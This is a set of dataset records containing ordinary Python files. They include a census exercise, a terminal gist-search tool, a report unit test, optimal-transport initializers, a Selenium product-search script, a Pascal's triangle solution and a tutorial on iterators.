salario_total += salario\r\n media_salario = salario_total / habitantes\r\n total_filhos += n_filhos\r\n media_filhos = total_filhos / habitantes\r\n percentual = habitantes * (acima_mil/100)\r\n habitantes += 1\r\n \r\n\r\n\r\n\r\nprint(f'O numero de habitantes cadastrados é: {habitantes}')\r\nprint(f'A média sálarial é de: {\"%.2f\" % media_salario}')\r\nprint(f'A média de filhos é: {\"%.2f\" % media_filhos}')\r\nprint(f'O percentual de pessoas que ganham mais de R$1000 é: {\"%.2f\" % percentual}%')\r\n\r\n\r\n","sub_path":"cap_07_iteracao/Lista_Fábio_03_em_for/fabio_iteracao_Q24_censo.py","file_name":"fabio_iteracao_Q24_censo.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"569167206","text":"#!/usr/bin/env python\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom fnmatch import fnmatch\nimport re\nimport sys\n\nfrom prompt_toolkit import Application\nfrom prompt_toolkit.buffer import Buffer\nfrom prompt_toolkit.enums import EditingMode\nfrom prompt_toolkit.key_binding import KeyBindings\nfrom prompt_toolkit.layout.containers import VSplit, Window, HSplit\nfrom prompt_toolkit.layout.controls import BufferControl\nfrom prompt_toolkit.lexers import Lexer\n\n\nfrom prompt_toolkit.layout.layout import Layout\nfrom prompt_toolkit.filters import to_filter, Condition\nfrom prompt_toolkit.styles import Style\nfrom pygments.lexers import Python3Lexer\n\nfrom prompt_toolkit.layout import Margin, NumberedMargin, ScrollbarMargin\nfrom prompt_toolkit.lexers import PygmentsLexer\nimport click\n\nfrom gistfinder.sync import Updater\nfrom .loader import Loader\nfrom .config import Config\nfrom .utils import print_temp\n\n\nfrom prompt_toolkit.styles.named_colors import NAMED_COLORS\nfrom prompt_toolkit.application.current import get_app\nfrom prompt_toolkit.filters import Condition\n\n@Condition\ndef not_in_search_mode():\n app = get_app()\n return app.state.layout.current_window != app.state.search_window\n\n\n\n# class RainbowLexer(Lexer):\n# def lex_document(self, document):\n# colors = list(sorted(NAMED_COLORS, key=NAMED_COLORS.get))\n#\n# def get_line(lineno):\n# ddd.ping()\n# return [(colors[i % len(colors)], c) for i, c in enumerate(document.lines[lineno])]\n#\n# return get_line\n\n\n\nclass AppState:\n SEARCH_DEFAULT_TEXT = ' Search:/ Window: Select: Exit: Help:'\n def __init__(self, loader):\n self.glob_expr = None\n self.text_expr = None\n self.desc_expr = None\n self.file_expr = None\n self.code_expr = None\n\n self.loader = loader\n\n self.list_buffer = Buffer(on_cursor_position_changed=self.list_row_change) # Editable buffer.\n # self.list_buffer.text = '\\n'.join(self.list_lines)\n self.sync_list_lines()\n\n self.list_buffer.read_only = to_filter(True)\n self.list_buffer.app_state = self\n\n self.content_buffer = Buffer() # Editable buffer.\n self.content_buffer.text = self.code(0)\n self.content_buffer.read_only = to_filter(True)\n self.content_buffer.app_state = self\n\n help_text = self.SEARCH_DEFAULT_TEXT\n self.search_buffer = Buffer(on_text_changed=self.search_text_change) # Editable buffer.\n self.search_buffer.app_state = self\n # self.search_buffer.text = help_text\n self.search_buffer.read_only = to_filter(True)\n self.search_buffer.app_state = self\n\n\n self._index = 0\n self.print_on_exit = False\n\n self._list_lines = None\n\n\n def sync_list_lines(self):\n # if self._list_lines is None:\n # self._list_lines = self.all_list_lines\n\n self.list_buffer.read_only = to_filter(False)\n self.list_buffer.text = '\\n'.join(self.list_lines)\n self.list_buffer.read_only = to_filter(True)\n\n def clear_searches(self):\n self.glob_expr = None\n self.text_expr = None\n self.desc_expr = None\n self.file_expr = None\n self.code_expr = None\n\n @property\n def list_recs(self):\n return self.loader.get(\n glob_expr=self.glob_expr,\n text_expr=self.text_expr,\n desc_expr=self.desc_expr,\n file_expr=self.file_expr,\n code_expr=self.code_expr\n )\n\n @property\n def list_lines(self):\n return [r['file_name'] for r in self.list_recs.values()]\n\n @property\n def descriptions(self):\n return [r['description'] for r in self.loader.records.values()]\n\n # def get_search_strings(self, query):\n # rex_glob = re.compile(r'\\\\g([^\\\\]+)')\n # rex_code = re.compile(r'\\\\c([^\\\\]+)')\n # rex_file = re.compile(r'\\\\f([^\\\\]+)')\n # rex_text = re.compile(r'\\\\t([^\\\\]+)')\n # rex_slash = re.compile(r'\\\\')\n #\n # mg = rex_glob.search(s)\n # if mg:\n # print(f'glob = {mg.group(1)}')\n #\n # mc = rex_code.search(s)\n # if mc:\n # print(f'code = {mc.group(1)}')\n #\n # mf = rex_file.search(s)\n # if mf:\n # print(f'file = {mf.group(1)}')\n #\n # mt = rex_text.search(s)\n # if mt:\n # print(f'text = {mt.group(1)}')\n #\n # ms = rex_slash.search(s)\n # print(f'has slash {bool(ms)}')\n\n # def search_text_change(self, buffer):\n # rex_glob = re.compile(r'\\\\g([^\\\\]+)')\n # rex_code = re.compile(r'\\\\c([^\\\\]+)')\n # rex_file = re.compile(r'\\\\f([^\\\\]+)')\n # rex_text = re.compile(r'\\\\t([^\\\\]+)')\n # rex_slash = re.compile(r'\\\\')\n #\n # app_state = buffer.app_state\n #\n # # query = buffer.text\n # # m_glob = rex\n # app_state.text_expr = buffer.text\n # app_state.sync_list_lines()\n # self.set_code(0)\n # return\n #\n # app_state = buffer.app_state\n # doc = buffer.document\n # pos = doc.cursor_position_row\n #\n # content_buffer = app_state.content_buffer\n # content_buffer.read_only = to_filter(False)\n # content_buffer.text = app_state.code(pos)\n # content_buffer.read_only = to_filter(True)\n\n def search_text_change(self, buffer):\n rex_glob = re.compile(r'\\\\g([^\\\\]+)')\n rex_code = re.compile(r'\\\\c([^\\\\]+)')\n rex_file = re.compile(r'\\\\f([^\\\\]+)')\n rex_text = re.compile(r'\\\\t([^\\\\]+)')\n rex_slash = re.compile(r'\\\\$')\n\n app_state = buffer.app_state\n\n query = buffer.text\n m_glob = rex_glob.search(query)\n m_code = rex_code.search(query)\n m_file = rex_file.search(query)\n m_text = rex_text.search(query)\n m_slash = rex_slash.search(query)\n\n self.clear_searches()\n\n if m_slash:\n return\n\n if m_glob:\n self.glob_expr = m_glob.group(1)\n if m_code:\n self.code_expr = m_code.group(1)\n if m_file:\n self.file_expr = m_file.group(1)\n if m_text:\n self.text_expr = m_text.group(1)\n\n if not any([bool(m) for m in [m_glob, m_code, m_file, m_text]]):\n self.text_expr = query\n\n # if m_glob:\n # self.glob_expr = query.replace('\\g', '')\n # elif m_code:\n # self.code_expr = query.replace('\\c', '')\n # elif m_file:\n # self.file_expr = query.replace('\\f', '')\n # else:\n # self.text_expr = query\n\n # app_state.text_expr = buffer.text\n\n app_state.sync_list_lines()\n self.set_code(0)\n return\n\n app_state = buffer.app_state\n doc = buffer.document\n pos = doc.cursor_position_row\n\n content_buffer = app_state.content_buffer\n content_buffer.read_only = to_filter(False)\n content_buffer.text = app_state.code(pos)\n content_buffer.read_only = to_filter(True)\n\n def list_row_change(self, buffer):\n app_state = buffer.app_state\n doc = buffer.document\n pos = doc.cursor_position_row\n\n content_buffer = app_state.content_buffer\n content_buffer.read_only = to_filter(False)\n content_buffer.text = app_state.code(pos)\n content_buffer.read_only = to_filter(True)\n\n def code(self, index):\n self._index = index\n if self.list_recs:\n return list(self.list_recs.values())[self._index]['code']\n else:\n return ''\n\n def set_code(self, index):\n content_buffer = self.content_buffer\n content_buffer.read_only = to_filter(False)\n content_buffer.text = self.code(index)\n content_buffer.read_only = to_filter(True)\n\n @property\n def selected_code(self):\n return self.code(self._index)\n\n @property\n def selected_file_name(self):\n return self.list_lines[self._index]\n\n @property\n def selected_description(self):\n return self.descriptions[self._index]\n\n def print(self):\n if not self.print_on_exit:\n return\n print('\\n', file=sys.stderr)\n print(file=sys.stderr)\n print(self.selected_code, file=sys.stderr)\n print('', file=sys.stderr)\n\n def register_windows(self, *windows):\n self.windows = windows\n self.current_window_index = 0\n\n def focus_window(self, index):\n self.current_window_index = index\n return self.current_window\n\n def next_window(self):\n self.current_window_index = (self.current_window_index + 1) % len(self.windows)\n return self.current_window\n\n @property\n def current_window(self):\n return self.windows[self.current_window_index]\n\n\nclass UI:\n def __init__(self):\n loader = Loader()\n if not loader.has_tables:\n msg = 'You must run sync command'\n print(msg, file=sys.stderr)\n sys.exit(1)\n\n self.state = AppState(loader)\n\n def get_container(self):\n\n list_window = Window(\n width=55,\n left_margins=[NumberedMargin()],\n content=BufferControl(buffer=self.state.list_buffer, focusable=True),\n cursorline=True,\n style='bg:#AE9EC9 fg:black',\n )\n\n code_window = Window(\n left_margins=[NumberedMargin()],\n content=BufferControl(buffer=self.state.content_buffer, focusable=True, lexer=PygmentsLexer(Python3Lexer)),\n ignore_content_width=True\n )\n\n search_window = Window(\n content=BufferControl(\n buffer=self.state.search_buffer,\n focusable=True,\n key_bindings=self.get_search_key_bindings(),\n # lexer=RainbowLexer()\n\n ),\n height=1,\n style='bg:#1B2631 fg:#F1C40F',\n )\n\n self.state.register_windows(list_window, code_window)\n self.state.search_window = search_window\n\n main_container = VSplit([list_window, code_window])\n\n\n root_container = HSplit([\n main_container,\n search_window\n ])\n return root_container\n\n\n def get_search_key_bindings(self):\n kb = KeyBindings()\n\n @kb.add('enter', eager=True)\n def _(event):\n window_to_focus = event.app.state.focus_window(0)\n event.app.layout.focus(window_to_focus)\n # event.app.state.search_buffer.text = ''\n # event.app.state.search_buffer.text = AppState.SEARCH_DEFAULT_TEXT\n # event.app.state.search_buffer.read_only = to_filter(True)\n # event.app.state.clear_searches()\n event.app.state.sync_list_lines()\n\n return kb\n\n\n\n def get_key_bindings(self):\n kb = KeyBindings()\n\n\n @kb.add('c-c')\n def _(event):\n \" Quit application. \"\n event.app.exit()\n\n @kb.add('enter')\n def _(event):\n \" Quit application. \"\n event.app.state.print_on_exit = True\n event.app.exit()\n\n @kb.add('space', filter=not_in_search_mode)\n def _(event):\n \" Quit application. \"\n window_to_focus = event.app.state.next_window()\n event.app.layout.focus(window_to_focus)\n\n @kb.add('/')\n def _(event):\n \" Quit application. \"\n window_to_focus = event.app.state.search_window\n event.app.layout.focus(window_to_focus)\n event.app.state.search_buffer.read_only = to_filter(False)\n event.app.state.search_buffer.text = ''\n\n @kb.add('escape')\n def _(event):\n \" Quit application. \"\n window_to_focus = event.app.state.focus_window(0)\n event.app.layout.focus(window_to_focus)\n event.app.state.search_buffer.text = AppState.SEARCH_DEFAULT_TEXT\n event.app.state.search_buffer.read_only = to_filter(True)\n event.app.state.clear_searches()\n event.app.state.sync_list_lines()\n\n return kb\n\n def run(self):\n root_container = self.get_container()\n kb = self.get_key_bindings()\n\n layout = Layout(root_container)\n style = Style(\n [\n ('cursor-line', 'fg:ansiwhite bg:#003366'),\n ('cursor-line', 'fg:#CCCCCC bg:#003366'),\n ]\n )\n\n app = Application(\n layout=layout,\n full_screen=True,\n key_bindings=kb,\n editing_mode=EditingMode.VI,\n mouse_support=True,\n style=style,\n )\n self.state.app = app\n self.state.layout = layout\n app.state = self.state\n\n app.run()\n self.state.print()\n\n\n@click.command(help='A CLI tool for searching your gists')\n@click.option('-t', '--token', help='Set up github token')\n@click.option('-s', '--sync', is_flag=True, help='Sync updated gists')\n@click.option('-r', '--reset', is_flag=True, help='Delete and resync all gists')\n@click.option('--fake', is_flag=True, help='Delete and resync all gists')\ndef cli(token, sync, reset, fake):\n if fake:\n Updater().rob()\n return\n if reset:\n Updater().reset()\n elif sync:\n Updater().sync()\n elif token:\n Config().set_github_token(token)\n else:\n UI().run()\n","sub_path":"gistfinder/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":13391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"169829857","text":"import os\nimport unittest\nimport logging\nimport pprint\n\nimport pbcommand.testkit\n\nfrom pbreports.report.preassembly import to_report\n\nfrom base_test_case import LOCAL_DATA\n\n_DATA_DIR = os.path.join(LOCAL_DATA, 'preassembly')\n\nlog = logging.getLogger(__name__)\n\nfiltered_reads = os.path.join(_DATA_DIR, 'filtered_subreads.fasta')\nfiltered_longreads = os.path.join(_DATA_DIR, 'filtered_longreads.fasta')\ncorrected_reads = os.path.join(_DATA_DIR, 'corrected.fasta')\nlength_cutoff = 60\n\n\nclass TestPreassemblyReport(unittest.TestCase):\n\n def test_basic(self):\n \"\"\"Basic smoke test to see if report generation is functioning\"\"\"\n report = to_report(filtered_reads, filtered_longreads, corrected_reads,\n length_cutoff=length_cutoff)\n log.info(\"Generated report: \" + str(report))\n log.info(pprint.pformat(report.to_dict()))\n self.assertIsNotNone(report)\n\n\nclass TestPolishedAssembly(pbcommand.testkit.PbTestApp):\n DRIVER_BASE = \"python -m pbreports.report.preassembly \"\n DRIVER_EMIT = DRIVER_BASE + \" --emit-tool-contract \"\n DRIVER_RESOLVE = DRIVER_BASE + \" --resolved-tool-contract \"\n REQUIRES_PBCORE = True\n INPUT_FILES = [\n filtered_reads,\n filtered_longreads,\n corrected_reads\n ]\n TASK_OPTIONS = {\n \"pbreports.task_options.length_cutoff\": length_cutoff\n }\n","sub_path":"tests/unit/test_pbreports_report_preassembler.py","file_name":"test_pbreports_report_preassembler.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"651133376","text":"# Copyright OTT-JAX\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport abc\nfrom typing import Any, Dict, Optional, Sequence, Tuple\n\nimport jax\nimport jax.numpy as jnp\n\nfrom ott import utils\nfrom ott.geometry import pointcloud\nfrom ott.problems.linear import linear_problem\n\n__all__ = [\n \"DefaultInitializer\", \"GaussianInitializer\", \"SortingInitializer\",\n \"SubsampleInitializer\"\n]\n\n\n@jax.tree_util.register_pytree_node_class\nclass SinkhornInitializer(abc.ABC):\n \"\"\"Base class for Sinkhorn initializers.\"\"\"\n\n @abc.abstractmethod\n def init_dual_a(\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n \"\"\"Initialize Sinkhorn potential/scaling f_u.\n\n Args:\n ot_prob: Linear OT problem.\n lse_mode: Return potential if ``True``, scaling if ``False``.\n rng: Random number generator for stochastic initializers.\n\n Returns:\n potential/scaling, array of size ``[n,]``.\n \"\"\"\n\n @abc.abstractmethod\n def init_dual_b(\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n \"\"\"Initialize Sinkhorn potential/scaling g_v.\n\n Args:\n ot_prob: Linear OT problem.\n lse_mode: Return potential if ``True``, scaling if ``False``.\n rng: Random number generator for stochastic initializers.\n\n Returns:\n potential/scaling, array of size ``[m,]``.\n \"\"\"\n\n def __call__(\n self,\n ot_prob: linear_problem.LinearProblem,\n a: Optional[jnp.ndarray],\n b: Optional[jnp.ndarray],\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> Tuple[jnp.ndarray, jnp.ndarray]:\n \"\"\"Initialize Sinkhorn potentials/scalings f_u and g_v.\n\n Args:\n ot_prob: Linear OT problem.\n a: Initial potential/scaling f_u.\n If ``None``, it will be initialized using :meth:`init_dual_a`.\n b: Initial potential/scaling g_v.\n If ``None``, it will be initialized using :meth:`init_dual_b`.\n lse_mode: Return potentials if ``True``, scalings if ``False``.\n rng: Random number generator for stochastic initializers.\n\n Returns:\n The initial potentials/scalings.\n \"\"\"\n rng = utils.default_prng_key(rng)\n rng_x, rng_y = jax.random.split(rng, 2)\n n, m = ot_prob.geom.shape\n if a is None:\n a = self.init_dual_a(ot_prob, lse_mode=lse_mode, rng=rng_x)\n if b is None:\n b = self.init_dual_b(ot_prob, lse_mode=lse_mode, rng=rng_y)\n\n assert a.shape == (\n n,\n ), f\"Expected `f_u` to have shape `{n,}`, found `{a.shape}`.\"\n assert b.shape == (\n m,\n ), f\"Expected `g_v` to have shape `{m,}`, found `{b.shape}`.\"\n\n # cancel dual variables for zero weights\n a = jnp.where(ot_prob.a > 0., a, -jnp.inf if lse_mode else 0.)\n b = jnp.where(ot_prob.b > 0., b, -jnp.inf if lse_mode else 0.)\n\n return a, b\n\n def tree_flatten(self) -> Tuple[Sequence[Any], Dict[str, Any]]: # noqa: D102\n return [], {}\n\n @classmethod\n def tree_unflatten( # noqa: D102\n cls, aux_data: Dict[str, Any], children: Sequence[Any]\n ) -> \"SinkhornInitializer\":\n return cls(*children, **aux_data)\n\n\n@jax.tree_util.register_pytree_node_class\nclass DefaultInitializer(SinkhornInitializer):\n \"\"\"Default initialization of Sinkhorn dual potentials/primal scalings.\"\"\"\n\n def init_dual_a( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n del rng\n return jnp.zeros_like(ot_prob.a) if lse_mode else jnp.ones_like(ot_prob.a)\n\n def init_dual_b( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n del rng\n return jnp.zeros_like(ot_prob.b) if lse_mode else jnp.ones_like(ot_prob.b)\n\n\n@jax.tree_util.register_pytree_node_class\nclass GaussianInitializer(DefaultInitializer):\n \"\"\"Gaussian initializer :cite:`thornton2022rethinking:22`.\n\n Compute Gaussian approximations of each\n :class:`~ott.geometry.pointcloud.PointCloud`, then compute closed from\n Kantorovich potential between Gaussian approximations using Brenier's theorem\n (adapt convex/Brenier potential to Kantorovich). Use this Gaussian potential\n to initialize Sinkhorn potentials/scalings.\n \"\"\"\n\n def init_dual_a( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n # import Gaussian here due to circular imports\n from ott.tools.gaussian_mixture import gaussian\n\n del rng\n assert isinstance(\n ot_prob.geom, pointcloud.PointCloud\n ), \"Gaussian initializer valid only for pointcloud geoms.\"\n\n x, y = ot_prob.geom.x, ot_prob.geom.y\n a, b = ot_prob.a, ot_prob.b\n\n gaussian_a = gaussian.Gaussian.from_samples(x, weights=a)\n gaussian_b = gaussian.Gaussian.from_samples(y, weights=b)\n # Brenier potential for cost ||x-y||^2/2, multiply by two for ||x-y||^2\n f_potential = 2 * gaussian_a.f_potential(dest=gaussian_b, points=x)\n f_potential = f_potential - jnp.mean(f_potential)\n return f_potential if lse_mode else ot_prob.geom.scaling_from_potential(\n f_potential\n )\n\n\n@jax.tree_util.register_pytree_node_class\nclass SortingInitializer(DefaultInitializer):\n \"\"\"Sorting initializer :cite:`thornton2022rethinking:22`.\n\n Solve non-regularized OT problem via sorting, then compute potential through\n iterated minimum on C-transform and use this potential to initialize\n regularized potential.\n\n Args:\n vectorized_update: Whether to use vectorized loop.\n tolerance: DualSort convergence threshold.\n max_iter: Max DualSort steps.\n \"\"\"\n\n def __init__(\n self,\n vectorized_update: bool = True,\n tolerance: float = 1e-2,\n max_iter: int = 100\n ):\n super().__init__()\n self.tolerance = tolerance\n self.max_iter = max_iter\n self.vectorized_update = vectorized_update\n\n def _init_sorting_dual(\n self, modified_cost: jnp.ndarray, init_f: jnp.ndarray\n ) -> jnp.ndarray:\n \"\"\"Run DualSort algorithm.\n\n Args:\n modified_cost: cost matrix minus diagonal column-wise.\n init_f: potential f, array of size n. This is the starting potential,\n which is then updated to make the init potential, so an init of an init.\n\n Returns:\n potential f, array of size n.\n \"\"\"\n\n def body_fn(\n state: Tuple[jnp.ndarray, float, int]\n ) -> Tuple[jnp.ndarray, float, int]:\n prev_f, _, it = state\n new_f = fn(prev_f, modified_cost)\n diff = jnp.sum((new_f - prev_f) ** 2)\n it += 1\n return new_f, diff, it\n\n def cond_fn(state: Tuple[jnp.ndarray, float, int]) -> bool:\n _, diff, it = state\n return jnp.logical_and(diff > self.tolerance, it < self.max_iter)\n\n fn = _vectorized_update if self.vectorized_update else _coordinate_update\n state = (init_f, jnp.inf, 0) # init, error, iter\n f_potential, _, _ = jax.lax.while_loop(\n cond_fun=cond_fn, body_fun=body_fn, init_val=state\n )\n\n return f_potential\n\n def init_dual_a(\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n init_f: Optional[jnp.ndarray] = None,\n ) -> jnp.ndarray:\n \"\"\"Apply DualSort algorithm.\n\n Args:\n ot_prob: OT problem between discrete distributions.\n lse_mode: Return potential if ``True``, scaling if ``False``.\n rng: Random number generator for stochastic initializers, unused.\n init_f: potential f, array of size ``[n,]``. This is the starting\n potential, which is then updated to make the init potential,\n so an init of an init.\n\n Returns:\n potential/scaling f_u, array of size ``[n,]``.\n \"\"\"\n del rng\n assert not ot_prob.geom.is_online, \\\n \"Sorting initializer does not work for online geometry.\"\n # check for sorted x, y requires point cloud and could slow initializer\n cost_matrix = ot_prob.geom.cost_matrix\n\n assert cost_matrix.shape[0] == cost_matrix.shape[\n 1], \"Requires square cost matrix.\"\n\n modified_cost = cost_matrix - jnp.diag(cost_matrix)[None, :]\n\n n = cost_matrix.shape[0]\n init_f = jnp.zeros(n) if init_f is None else init_f\n\n f_potential = self._init_sorting_dual(modified_cost, init_f)\n f_potential = f_potential - jnp.mean(f_potential)\n\n return f_potential if lse_mode else ot_prob.geom.scaling_from_potential(\n f_potential\n )\n\n def tree_flatten(self) -> Tuple[Sequence[Any], Dict[str, Any]]: # noqa: D102\n return ([], {\n \"tolerance\": self.tolerance,\n \"max_iter\": self.max_iter,\n \"vectorized_update\": self.vectorized_update\n })\n\n\n@jax.tree_util.register_pytree_node_class\nclass SubsampleInitializer(DefaultInitializer):\n \"\"\"Subsample initializer :cite:`thornton2022rethinking:22`.\n\n Subsample each :class:`~ott.geometry.pointcloud.PointCloud`, then compute\n :class:`Sinkhorn potential `\n from the subsampled approximations and use this potential to initialize\n Sinkhorn potentials/scalings for the original problem.\n\n Args:\n subsample_n_x: number of points to subsample from the first measure in\n :class:`~ott.geometry.pointcloud.PointCloud`.\n subsample_n_y: number of points to subsample from the second measure in\n :class:`~ott.geometry.pointcloud.PointCloud`.\n If ``None``, use ``subsample_n_x``.\n kwargs: Keyword arguments for\n :class:`~ott.solvers.linear.sinkhorn.Sinkhorn`.\n \"\"\"\n\n def __init__(\n self,\n subsample_n_x: int,\n subsample_n_y: Optional[int] = None,\n **kwargs: Any,\n ):\n super().__init__()\n self.subsample_n_x = subsample_n_x\n self.subsample_n_y = subsample_n_y or subsample_n_x\n self.sinkhorn_kwargs = kwargs\n\n def init_dual_a( # noqa: D102\n self,\n ot_prob: linear_problem.LinearProblem,\n lse_mode: bool,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n ) -> jnp.ndarray:\n from ott.solvers.linear import sinkhorn\n\n assert isinstance(\n ot_prob.geom, pointcloud.PointCloud\n ), \"Subsample initializer valid only for pointcloud geom.\"\n rng = utils.default_prng_key(rng)\n rng_x, rng_y = jax.random.split(rng, 2)\n\n x, y = ot_prob.geom.x, ot_prob.geom.y\n a, b = ot_prob.a, ot_prob.b\n\n # subsample\n sub_x = jax.random.choice(\n key=rng_x, a=x, shape=(self.subsample_n_x,), replace=True, p=a, axis=0\n )\n sub_y = jax.random.choice(\n key=rng_y, a=y, shape=(self.subsample_n_y,), replace=True, p=b, axis=0\n )\n\n # create subsampled point cloud geometry\n sub_geom = pointcloud.PointCloud(\n sub_x,\n sub_y,\n epsilon=ot_prob.geom.epsilon,\n scale_cost=ot_prob.geom._scale_cost,\n cost_fn=ot_prob.geom.cost_fn\n )\n\n # run sinkhorn\n subsample_sink_out = sinkhorn.solve(sub_geom, **self.sinkhorn_kwargs)\n\n # interpolate potentials\n dual_potentials = subsample_sink_out.to_dual_potentials()\n f_potential = jax.vmap(dual_potentials.f)(x)\n\n return f_potential if lse_mode else ot_prob.geom.scaling_from_potential(\n f_potential\n )\n\n def tree_flatten(self) -> Tuple[Sequence[Any], Dict[str, Any]]: # noqa: D102\n return ([], {\n \"subsample_n_x\": self.subsample_n_x,\n \"subsample_n_y\": self.subsample_n_y,\n **self.sinkhorn_kwargs\n })\n\n\ndef _vectorized_update(\n f: jnp.ndarray, modified_cost: jnp.ndarray\n) -> jnp.ndarray:\n \"\"\"Inner loop DualSort Update.\n\n Args:\n f: potential f, array of size n.\n modified_cost: cost matrix minus diagonal column-wise.\n\n Returns:\n updated potential vector, f.\n \"\"\"\n return jnp.min(modified_cost + f[None, :], axis=1)\n\n\ndef _coordinate_update(\n f: jnp.ndarray, modified_cost: jnp.ndarray\n) -> jnp.ndarray:\n \"\"\"Coordinate-wise updates within inner loop.\n\n Args:\n f: potential f, array of size n.\n modified_cost: cost matrix minus diagonal column-wise.\n\n Returns:\n updated potential vector, f.\n \"\"\"\n\n def body_fn(i: int, f: jnp.ndarray) -> jnp.ndarray:\n new_f = jnp.min(modified_cost[i, :] + f)\n return f.at[i].set(new_f)\n\n return jax.lax.fori_loop(0, len(f), body_fn, f)\n","sub_path":"src/ott/initializers/linear/initializers.py","file_name":"initializers.py","file_ext":"py","file_size_in_byte":12862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"552897876","text":"# Claudia Trejo, 2017.05.18\n#Chapter 1 Getting Started With Selenium\n\n# Setting up Goole Chrome\nimport os\nfrom selenium import webdriver\n\n# Get the path of chromedriver\ndir = os.path.dirname(__file__)\nchrome_driver_path = dir + \"/chromedriver\"\n# Remove the .exe extension on linux or mac plataform\n\n# Create a new Chrome session\ndriver = webdriver.Chrome(chrome_driver_path)\ndriver.implicitly_wait(30)\ndriver.maximize_window()\n\n# Navigate to the application home page\ndriver.get(\"https://magento.com/search/gss\")\n\n# Get the search textbox\nsearch_field = driver.find_element_by_id(\"edit-keys\")\nsearch_field.clear()\n\n# Enter search keyword and submit\nsearch_field.send_keys(\"phones\")\nsearch_field.submit()\n\n# Get all the anchor elements wichs have product names displayed\n# currently on result page find_elements_by_xpath method\nproducts = driver.find_elements_by_xpath(\"//*[@class='result-title']\")\n\n# Get the number of anchor elements found\nprint(\"Found \" + str(len(products)) + \" products:\" )\n\n# Iterate through each anchor element and print the text that is\n# name of the product\nfor product in products:\n print(product.text)\n\n# Close the browser window\ndriver.quit()","sub_path":"LearningSeleniumTestingPython/OwnExamples_py3/search_products_chr.py","file_name":"search_products_chr.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"600532516","text":"class Solution:\n\t# @return a list of lists of integers\n\tdef triangle(self, numRows):\n\t\tif numRows == 0:\n\t\t\treturn []\n\t\telif numRows == 1:\n\t\t\treturn [1]\n\t\telif numRows == 2:\n\t\t\treturn [1,1]\n\t\telse:\n\t\t\ta = self.triangle(numRows - 1)\n\t\t\tb = []\n\t\t\tb.append(1)\n\t\t\tfor i in range (0, len(a) - 1):\n\t\t\t\tb.append(a[i] + a[i+1])\n\t\t\tb.append(1)\n\t\t\treturn b\n\n\tdef generate(self, numRows):\n\t\ta = []\n\t\tif numRows == 0:\n\t\t\treturn []\n\t\tfor i in range(1, numRows + 1):\n\t\t#print(i , self.triangle(i))\n\t\t\ta.append(self.triangle(i))\n\n\t\treturn a\n\ns = Solution()\n#n = int(input())\nn = 500\n#print(s.generate(n))\ns.generate(n)\n","sub_path":"pascals-triangle.py","file_name":"pascals-triangle.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"414087837","text":"\"\"\"-----------------------------------ITERATORS CONCEPTS--------------------------------\"\"\"\n\n# This library is the wrapper for numpy,pandas,matplotlib and seaborn\nimport self as self\n\"\"\"\nfrom pyforest import *\n\n\n# Create Number Upto 10\n\n# Looping through the list\nclass Iterator_Concepts:\n\n def __init__(self):\n Natural_No = np.arange(1, 10, 1)\n # Getting an iterator through iter()\n # print('-----------------FIRST APPROACH OF CREATING AN ITERATOR By USING iter()-------------------')\n iteri_concepts = iter(Natural_No)\n # Iterating through it using next()\n\n print(next(iteri_concepts))\n print('-------------------SECOND APPROACH OF CREATING AN ITERATOR BY USING .__next__() ------------')\n print(iteri_concepts.__next__())\n print(\"Creating A Function to Iterate through\")\n print()\n\n for i in iteri_concepts:\n print(i, end=' ')\n\n def my_iterator(self):\n print('My Iterator Function')\n try:\n # counter = 0\n # print('The counter =', counter)\n my_list_2 = np.arange(10, 140, 10)\n my_iter_1 = iter(my_list_2)\n for i in my_iter_1:\n if i == 120:\n continue\n else:\n print(i)\n except NameError:\n print('Name is not defined')\n except Exception:\n print(\"Other Exception\")\n finally:\n print('The execution is done')\n\n\nif __name__ == \"__main__\":\n a = Iterator_Concepts()\n a.my_iterator()\n\"\"\"\n\n# Some Basic Example to understand Iterators in depth\n\"\"\"\nclass Addition:\n def __init__(self, a: int, b: int) -> int:\n try:\n self.a = a\n self.b = b\n except NameError:\n print('The Name is not defined properly')\n except TypeError:\n print('The Type should be specified correctly')\n except Exception:\n pass\n\n def __iter__(self):\n '''The __iter__() function returns an\n iterator for the given object (array, set, tuple etc. or custom objects).\n It creates an object that can be accessed one element at a time using __next__()\n function, which generally comes in handy when dealing with loops.\n '''\n try:\n\n self.result = self.a + self.b\n return 